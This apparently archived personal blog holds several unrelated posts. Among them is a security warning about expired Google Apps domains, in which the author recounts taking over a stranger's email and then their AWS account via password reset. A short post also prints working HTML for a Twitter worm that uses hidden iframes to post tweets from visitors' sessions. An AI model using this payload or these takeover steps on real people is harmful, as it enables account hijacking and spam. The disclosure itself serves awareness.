Ben Reyes's posterous

Do not let your domain expire with Google Apps

If you do, anybody can have access to your account, your emails, passwords, calendar and all of your social network accounts. That might not seem like much but to a social engineer (Black Hat Security) it's a goldmine.

Old expired domains with Google Apps accounts that are picked up by new owners will still have all your data, emails, calendar information, e.t.c attached to that domain. Your email is your root identity online (might argue facebook is, but Facebook still requires an email). So accessing this is a potential gateway to everything especially if you have admin access (HBGary)

Generally speaking though, this intentional design flaw can be exploited with or without Google Apps. And you might ask, what is the harm in someone accessing my old email address? Well if you still have accounts attached to it, a social engineer may use that to dig more information to form an attack.

To sum it up. Don't let your domain expire attached to any form of your identity. Ever. 
[TechCrunch has written a writeup of this post]

 

 

So this all started when I just recently registered for the domain name http://dabble.in, tried to register it on Google Apps

Looks like someone registered the domain. I tweeted in frustration, looking for Google Apps people to solve my issue and remove the domain from existing accounts.

I got a response from a Google employee about how to reclaim the domain on Google apps that's a publicly established way to do so (http://www.google.com/support/a/bin/answer.py?answer=96917).

It involves proving your the domain holder. Okay, sure. I own the domain, that's no problem. Changed a few DNS settings and wait a little while for Google to recognise this. Then boom, I'm in.

Google asks for which administrator I want to login as, and here's where it gets interesting. It lists two people, I have no idea who they are. I pick one at random and pick a new password.

I'm in, and now I'm looking at an inbox with a few years worth of emails that I have no clue who it belongs to.

Now this is my "Holy Crap Moment" I have this person's history. As a proof of concept as how meaningful this is for a "Black Hat Social Engineer" I have full access to this person's emails, calendar, contacts and the ability to pretend to be this person. And can use this information to establish an attack on not only this individual but organisations and others connected with this person in question.

Social Engineering Vulnerabilities focuses on the weak link in computer security architecture, humans. The information in these emails may contain valuable information that might not seem interesting at all but can be used in collection of larger peices information to lay the ground work for an attack.   

Even though this information is dated it is still crazily useful in an attack. And to show you just how useful, I managed to gather this person has registered to Amazon Web Service. Sent a quick password reset request.

Boom, I'm in. Amazon and to be honest most other websites only require an email address identification in order to reclaim your account. Now with Amazon, I now have access to not only their files on AmazonS3 and EC2, including old server config variables I now have a Name, Address/Post code and also the person's last 4 digits on their credit card (which is still valid and hasn't expired).

Now, I've just defeated 2 authentication systems fairly easily, with the first one being legitimate. There's more, around the last 4 digits of a credit card. This is used by others as authentication when you loose your password, for example PayPal. Even though PayPal may ask for additional credentials, if I was an attacker I already have enough information to find out what the answers to this would be.

I'm not going to demonstrate further as I have enough information to contact the individual but if I wanted to I could take it further.

• Access Dropbox and all files
• Access to PayPal
• Access to Facebook
• As an administrator with the ability to access any other email accounts e.g if it's a now defunct company that let their the domain expire, I now have access to all of their empoyees emails, calendars and contact info.

If you have read up on any of the HBGary stuff where "anonymous" attacks the website by gaining enough information to defeat one level of authentication for something that seems isolated, the rest becomes easier to access and attack, especially when you have admin access.

The lesson learned here is if you have a domain name don't let it expire with identities (incl. Google Apps) still associated with it.

 

Update Wednesday 18th May 2011 - Google security team responded to the issue (Thanks to Michael Mahemoff @Google for relaying the issue):

Thanks for contacting us about this topic. Google Apps account ownership is directly linked to domain name ownership. If the domain registration is about to expire, it's up to the Google Apps Administrator to renew the domain or export the data in a timely manner ahead of that expiration. As you indicate in your post, this is true for any type of expired domain — it's not unique to Google Apps.  The easy way to avoid any of this is to make sure your domain is renewed. Many domain registrars offer auto-renewal features as part of their service, and they send reminders before domains are due to expire. Google offers auto-renewal if admins purchase their domain through our enrollment process, and we send warnings several times before these domains are due to expire, as well as after the domain has expired.  We'd appreciate it if you would update your planned post with this additional detail to make clear to users how they can avoid the situation you described. Thanks for working with us.

 It may appear that Google Apps team may have changed their policies due to my contact with them. See hacker news comments for more information (although this is not yet confirmed by Google and unless sliently disabled the recovery via DNS is still being shown as an option [screenshot taken on Thursday 19th May 2011 00:40]). The issue still exists as a wider problem with domains. I still could have accessed the person's Amazon account using a wildcard email address. The lesson is no less serious, don't let your domains expire with your accounts attached to them.

 

Note: Originally written March 19, 2011 at  9:08 AM but I waited for Googles response before publishing (Wednesday 18th May)

----------------------------

Further recommended reading: The Art of Deception by Kevin Mitnick,
A really good book about social engineering with cases on how to defend against different types of attacks (Amazon Affiliate Link)

My contact information is on http://benreyes.com and I'm interested in "Social Engineering"/Social Architecture in the white hat, non-security arena (web products). I'm also currently working on a series of blog posts on Social Psychology for the web.

Follow me on Twitter (@3en)

 

----------------------------

 

• TechCrunch http://techcrunch.com/2011/05/18/security-breach-heres-how-expired-domains-expose-you-to-embarrassment-and-theft/
• Tech News Today (TWiT) 
• Inc. Technology http://technology.inc.com/2011/05/20/expired-domains-pose-hacking-risk p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Arial; color: #1a37ef} span.s1 {text-decoration: underline}

 

VentureHacks watches your copy & pastes!

I was reading the popular blog 'VentureHacks' for my weekly fix of startup and funding advice. Having been inspired by one of the topics I quickly copy and pasted a quote from one of the article to include in a tweet. (Tweets often full of quotes I find insightful: twitter.com/3en) 

Something strange happened, the browser displayed that it 'refreshed' or sent data back to the site when I hit Command + C (Windows: Ctrl+C).

And sure enough through checking the HTML source VentureHacks was sending back data via javascript about what text you copy and pasted. The service they are using is WordVu. I've never heard of this app before but this is really interesting for publishers.

And here's why it's interesting:

We know from people like Eric Ries (@ericries) and Dave Mcclure (@davemcclure) that data and metrics is an awesome way to gain insights into your customers and your audiences. For publishers knowing what people are copy and pasting from your website allows you to figure out what content people find insightful and worth sharing in an email or tweet.

So if you run a blog and want to know more about your readers, WordVu makes for an interesting tool. Now the question is, how effective is that data and what can you do with it.

Edit 31/10/10: Changed title from 'VH watches your every move' to make the post seem less sensational at the request of Nivi one of the founders of 'VentureHacks' 

 

 

 

"Sex with goats" Twitter Worm HTML

	<html>
	<head></head>
	<body>
	<script>
	var el1 = document.createElement('iframe');
	var el2 = document.createElement('iframe');
	el1.style.visibility="hidden";
	el2.style.visibility="hidden";
	el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
	el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
	document.getElementsByTagName("body")[0].appendChild(el1);
	document.getElementsByTagName("body")[0].appendChild(el2);
	</script>
	</body>
	</html>

An email to Steve Jobs

Dear Steve,

Notes on "Design for Developers"

 

 

 

Layouts

Grid systems makes it less likely to suck

• http://960.gs
• http://www.blueprintcss.org/ 

Separating content

• Use 1 pixel dotted line to separate content 

Typography

• Line height you want: 1.3-2em 
• Paragraphs columns should be two alphabets (abcdefqhi..) wide. So it's clean and not confusing 
• Text/content good (text) 16pt /1.3 em for long text e.g blog post 
• 2-3 typefaces max 
• pair typefaces 
  • San-serif (e.g Helvetica) for titles 
  • Serif (e.g Georgia) for body text 
• Read and obey these sites: 
  • http://www.typographyforlawyers.com/ 
  • http://webtypography.net 
• Using embedded fonts (pretty much all browsers support) 
  • Hosted fonts: TypeKit -- Also Google is starting to host fonts 
  • DIY: FrontSquirrel (@font-face generator) 
  • Need to support different font formats EOT, OTF, WOFF, SVG 

Colour

Ways to pick colour schemes

• Monochoromatic (one colour and grey, one colour and black) 
• Analogous 
• Complementary (most contrast) 
• Split Complementary 
• Tetrad 

Websites for picking colour

• http://colourlovers.com 
• http://kuler.adobe.com 

Stealing (draw inspiration) and learn

• http://PatternTap.com 

"25 Fresh Design Sites"

• http://SmashingMagazine.com 
• http://webdesignledger.com 

Free books

• Designing for the web http://designingfortheweb.co.uk/book/index.php 

Break Rules - Breaking rules that what Just don't break too many at once.

Diving into Ruby

I've been wanting to pick up a new web development language other than PHP for a little while now. The 3 currently popular web languages that I get from talking with other developers are Pyton and Ruby.

I was considering going with Pyton but have chosen Ruby because of the coolness of the cloud hosting platform heroku.com.

I am currently following Joel Gascoigne's posterous with he's foray into Ruby from PHP newtoruby.com. As he takes a similar path as I am from PHP it would be interesting following along.

So my journey begins..

 

Installing Ruby locally on OSX

Turns out ruby is already installed since tiger. All I had to do is update it from the terminal. It's also dead simple to install Ruby on Rails by running the command "gem install rails --include-dependencies". 

But I'm going to skip out on the frameworks for now and work on learning pure ruby =D

Initial thoughts on the language

The first thing that strikes me with Ruby is it's object orientated approach. Or at least that's how their teaching it on the quick start guide (ruby-lang.org/en/documentation/quickstart)

So for I'm pretty happy with the syntax though it is going to take me a little while for it to burn into my brain and be able to write it blindly.

I've covered strings, simple maths, arrays, methods and classes. Until next time.

 

Bug report to @DailyBooth HQ: Follower count sync issue

**Update from Ryan http://twitter.com/RyanAmos/status/11465844947 about the issue:

@3en That user's info has been fixed. I'm pushing out code this weekend that should remedy this issue as well as preparing for API launch.

 

 

 

Hey Ryan, 

[joke] You should really just give me access to your bug tracking and development cycle app so I can add feature requests and bugs. [/joke]

I'm data scraping DailyBooth to run some useful apps, like one to notify you via email when someone unfollows you. Refactoring my code I found an issue with Dailybooth, as follows:

ISSUE: Synchronisation issue with follower count on user profile and followers (possible caching issue)

There is a mis-sync between the two follower counts.

User with reported issue: joosh
Follower Count based on sidebar on profile: 114
Follower Count based on (http://dailybooth.com/joosh/followers/): 112

[http://twitpic.com/1cjwob : Screenshot of follower count]

/**** Confirmed as http://dailybooth.com/joosh/followers/11 display 2 followers. Based on the calculation that 10 followers per page, Joosh has 11 full pages worth of followers and 1 page with 2 followers (page 0 is counted). 11*10=110+2=112 ***/

Dailybooth and social change

***** This is an article piece I am currently working on, it is no way shape or finish a final draft ****

 

DailyBooth

DailyBooth one of the fastest growing sites in Silicon Valley according to TechCrunch [1] compares to a online photo booth social network allowing users to post photos of themselves daily. The site has taken off with users aged 15-25 from the US, UK and Canada.

I believe DailyBooth could possibly be in the midst of a social storm. With the alarming adoption pace of social trends and the current growth of the website, they may very well become one of the largest web sites on the internet or be a catalyst for something even bigger.

With several years of observation and research into social technological trends, I will attempt to solidify and share some of my thoughts, visions and opinions on where we are headed as a society providing some of my insights on DailyBooth.

The beginnings of social changes
So here my journey begins with my two cents on Dailybooth and general social change online. In the twenty first century (2001 onwards) social change has predominantly centred around the communication disruption inline with the adoption of the web and internet.

Growing up I've been on the edge of the social curve inline with advances of technology. Like many, looking back I've noticed I've tended to adopt social technological trends before they have become widely accept as the norm. Since then I've forever been interested in technological social change and trends, I do this because I'm looking for disruptions that I can take advantage of when starting a company, which would take many of the CEOs and technologist a long while to understand what is happening.

In 2007 during the Web 2.0 era I worked on a private summer camp teaching digital arts and creativity. What I've noticed from observing kids 7-16 and even younger counsellors use technology in a social manner is that has suitable differences between my own perception, use and boundaries with social uses of technology. Even kids with only a few years difference to myself had different social norms. Changes in perception and boundaries around public vs private, sharing of information and types of sites that they use all have differences in different subsets of groups. Consumption of media shifted from the MTV generation to democratised and decentralized consumer generated media. A lot of the conversations centred around YouTube videos of friends and other internet figures such as Fred Figglehorn [2].

Growing up with technology and especially in an environment where social and technological adoption of trends is at a faster rate clearly shows changes in consumption and social habits.

Following this I've researched and presented on the topics of generational change of social surrounding technology and lowered barriers of communication and creativity. [3]

Creativity vs. Consumerism and Public vs. Private
One of the most predominant trends I have observed both my research and myself is the switch from consumerism to creativity and from private to public.

 

*creativity*

- Maker Bot / Hacker Community
- Social media, we all create content (olden days, was personal websites, newgroups and forums) *public*
- Popularity online, micro internet celebrities *public*
- Less time on TV more time on the internet

 

Where are all the "cool kids" at?

With the switch to creativity and being public, building a reputation. I did a bit of research into where all the "cool kids" are creating content online and building public reputation. I exclude sites like Facebook or other social networks where predominately they are based on your existing friends network which are mostly private.

I'm not talking about the main stream but the trend setters and the early adopters. We're not looking at what the mainstream is doing now, but at trying to find what they are going to do next. These trend setters are called "Mavens" in Malcom Gladwell's Book, Tipping Point [temp1].

The list breaks down as the following, in no particular order.

- Tumblr
- Stickam / BlogTV (and other live streaming video services)
- Youtube
- Twitter
- Dailybooth

 

 

*Reminder to self*

You need to cover the basic points too. Assuming that people understand or have knowledge of the underpinning forces in the points I make is wrong and causes people to blindly disagree because they are unable to put it in relative terms of what they see. Also makes my points seem less crazy.

 

End conclusion

*draft summary*

For the skeptics this social trend may not matter to you no more than the latest converse sneakers catches your eye. Though it cannot be denied that on some level this is happening, it only take a small about of conditions for the tipping point. [temp1]

[1] http://www.crunchbase.com/company/dailybooth
[2] http://en.wikipedia.org/wiki/Fred_Figglehorn, http://fredfigglehorn.com/
[3] Noted, it seems to generate controversy, discussion and disagreement around the topics of social change especially with generational differences. But I am not debating if this is a good thing or a bad thing but more to the fact that it is happening and changes will happen when a generation of people with this mindset enters the work place and politics.

 

[temp1] Tipping Point a term used in Malcolm Gladwell 2001 book titled Tipping Point http://www.gladwell.com/tippingpoint

 

Plans for company culture

This is a working document of things I would like to build a company culture around. I take this from personal experience and from things I hear from different sources. The reason why I'm compiling them now, it's so that it is a lot easier to build and maintain company culture from the start.

I've worked in place where culture had fallen apart.

*** Working document, not everything in here I will stick to and not everything is the right thing ***

Office politics is not wanted here

• Value added (performance) based not time based
  Employees should not be judged based on time but solely on value add. Allow people to mange their own time and when their most productive.
  
• Transparent and open employee pay-scale
  As part of eliminating office politics and having everything performance based there should be an open and transparent employee payscale. 
  
  http://www.inc.com/magazine/20090401/how-hard-could-it-be-employees-negotiate-pay-raises_pagen_2.html

Company development cycle

• Allow freedom to build weekend features in, freely
  If there is a feature or project that someone wants to undertake and it can be done within weekend(s) but is not a core part of the product life cycle, then let them implement it (as long as there are no negative effects). This is not done for reward but from the persons own personal conviction, reward people for it but don't make money the main motivational factor.

People

• Hiring
  Ask divergence testing questions to determine out of box thinking and creativity during interview stage:
  e.g  List as many uses as you can for the following objects?1. A brick2. A blanket

  Reference: http://thisbrazenteacher.blogspot.com/2008/12/testing-intelligence.html
  Malcolm Gladwell's Outliers Book  

• Do not turn people down if they ask to work for you
  If someone is interested in working for the company do not say no. If you can't afford to pay them, then say so. There are other ways to work with them. The reason for this, is that people that knock on your doors may be more passionate about your startup than a random hire.

 

• Meetings are Toxic 
• Goals
  • Look into OKR - Objectives and Key Results - Used by Google, Employees set themselves quarterly goals and targets which are visible to the whole company. And the goal is the achieve 2/3rds of the OKRs as if you achieve all of them you are not placing them high enough.

Work Spaces

• Open desk space 
  Cubicals are something of the past. They're not wanted here. Sharing of information is powerful by just being in the same physical space

 

 

• Quiet Zones
  Space should allow for people to get into flow without interruption.

Ways to save money in the UK

Coupons
Sites like http://www.voucherhub.com, http://www.retailmenot.com help in finding online voucher codes for discounts. You can also type in Google 'retailer name' coupon or discount. E.G typing in 'amazon coupon' into Google will bring up the coupon websites with valid discount coupons.

Other keywords are: discount, voucher, coupon

Google Products and Check amazon
Before I buy anything online I check http://google.co.uk/products and http://amazon.co.uk

Travel in the UK & London
If under 25 get the 16-25 young persons national rail card. http://www.16-25railcard.co.uk/
Along with discount rail tickets, if your in London an use a Pay as You Go Oyster card. Go to the ticket desk in the underground. And ask for your young persons rail card discounts to be applied to your PAYG Oyster Card. It'll bring down the daily cap prices.

Student Discounts
Get an NUS extra card and ask before paying if a retailer has student discounts. http://www.nus.org.uk/en/nus-extra/
You can even try avoiding getting a NUS card by using your normal student card.

Cashback Websites
For example before you order something online from a UK retailer or get yourself a TV/phone/broadband package take a look at http://www.quidco.com/ or any other cash back website.

The way it works is that the retailer pays the company a fee like £60 for finding them a new customer. In return Quidco or these websites give you back something like £40 for signing up for broadband. It's a nice way to earn money on the things you was going to buy any way.

Money Savings Expert
A huge resource full of information and tips on deals http://www.moneysavingexpert.com/

Complain
If ever you deal with a large company or even a franchised one like Tesco, Sainsburys, Dominos Pizza, Pizza Hut, Subway. And if for some reason there was an issue with something you bought or the service. Drop an email to the corporate headquarters and they often setup a small budget for refunding or offering vouchers and free meals for customers that file complaints. These companies do not want to lose your loyalty.

I've done this both with Dominos Pizza and Subway and gotten a free meal or pizza (I have a friend that worked for Tesco's and all he did was give out vouchers to people that complain about anything).

Cancel your account
So for stuff you usually pay monthly like your phone/mobile service and broadband. Go through the process of cancelling your account, companies usually have a budget for retention and trying to keep customers. So you can try to lower your existing bills that way and most likely they will offer you a better deal.

Though watch out as some times if a company doesn't have a retention program they will just cancel your account. But most big companies have a retention program. I know this from working at BE Broadband / O2. 

Don't Spend
Pretty simple eh? Try not to impulse buy, save on the things you have to buy/

These are my tactics. @3en (on twitter) or ben@benmatthew.net